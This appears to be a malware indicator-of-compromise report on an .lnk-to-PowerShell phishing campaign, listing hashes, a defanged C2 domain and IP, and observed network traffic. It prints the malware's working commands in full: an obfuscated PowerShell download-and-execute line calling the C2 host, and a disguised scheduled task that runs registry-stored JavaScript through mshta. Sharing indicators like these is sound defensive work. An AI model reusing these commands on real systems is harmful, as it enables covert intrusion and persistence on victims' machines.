#IOC #OptiData #VR #LNK #powershell #fingerprinting #heavyobfuscated
https://pastebin.com/s6ymr2x5

attack_vector
--------------
email attach .lnk > powershell > get base64 > decode > fingerprint system

email_headers
--------------
n/a

files
--------------
SHA-256   18db236b61275f22fc4a02946b6799d881cee985f9e7e8929c6dd9c135894460
File name КМУ база даних.zip [Zip archive data, at least v2.0 to extract]
File size 317.6 KB

SHA-256   3d19f49788f531af53f5e0a345cd6812e2f2a581c612e5a702598c5c7170c11b
File name sample.rtf.lnk [MS Windows shortcut, Item id list present, Points to a file or directory]
File size 3.08 KB

activity
**************
PL_SC = cdn1186{.} site/zG4roJ
C2    = cdn1186{.} site/ua/news

netwrk
--------------
88.85.86.229 cdn1186{.} site GET  /zG4roJ  HTTP/1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
88.85.86.229 cdn1186{.} site POST /ua/news HTTP/1.1 noUA

comp
--------------
powershell.exe 1544 TCP 88.85.86.229 80 ESTABLISHED

proc
--------------
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W hidden -Com "$cx=New-Object -ComObject MsXml2.ServerXmlHttp;$cx.Open('GET','http://cdn1186{.} site/zG4roJ',$False);$cx.Send();$cx.ResponseText|.( ''.Remove.ToString()[14,50,27]-Join'')
C:\Windows\system32\schtasks.exe /create /tn FamilySafetyMonitor-{13f45184-7396-4dff-9da2-b98f92b1d2d0} /sc hourly /mo 2 /tr "MsHTa.EXe 'JaVAsCRIpT:var pata='efada'; var naxe='ifero'; var dhf=new ActiveXObject('\x77\x53\x43\x52\x69\x50\x54\x2e\x53\x48\x65\x6c\x4c');var GJj=dhf.RegRead('HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\EventSystem\\{l1k}\\Igoso');eval(GJj);close();' "
C:\Windows\system32\schtasks.exe /QUERY /FO CSV
C:\Windows\system32\cmd.exe /c chcp 866 & SYSTEMINFO /FO CSV /NH 2>&1
C:\Windows\system32\chcp.com
C:\Windows\system32\systeminfo.exe /FO CSV /NH

persist
--------------
Task Scheduler
\FamilySafetyMonitor-{13f45184-7396-4dff-9da2-b98f92b1d2d0}
Microsoft (R) HTML Application host
Microsoft Corporation c:\windows\syswow64\mshta.exe 14.10.2013 7:50
"MsHTa.EXe" "JaVAsCRIpT:var pata="efada"; var naxe="ifero"; var dhf=new ActiveXObject("\x77\x53\x43\x52\x69\x50\x54\x2e\x53\x48\x65\x6c\x4c"); var GJj=dhf.RegRead("HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\EventSystem\\{l1k}\\Igoso");eval(GJj);close();"

drop
--------------
n/a

# # #
https://www.virustotal.com/#/file/18db236b61275f22fc4a02946b6799d881cee985f9e7e8929c6dd9c135894460/details
https://www.virustotal.com/#/file/3d19f49788f531af53f5e0a345cd6812e2f2a581c612e5a702598c5c7170c11b/details

VR
@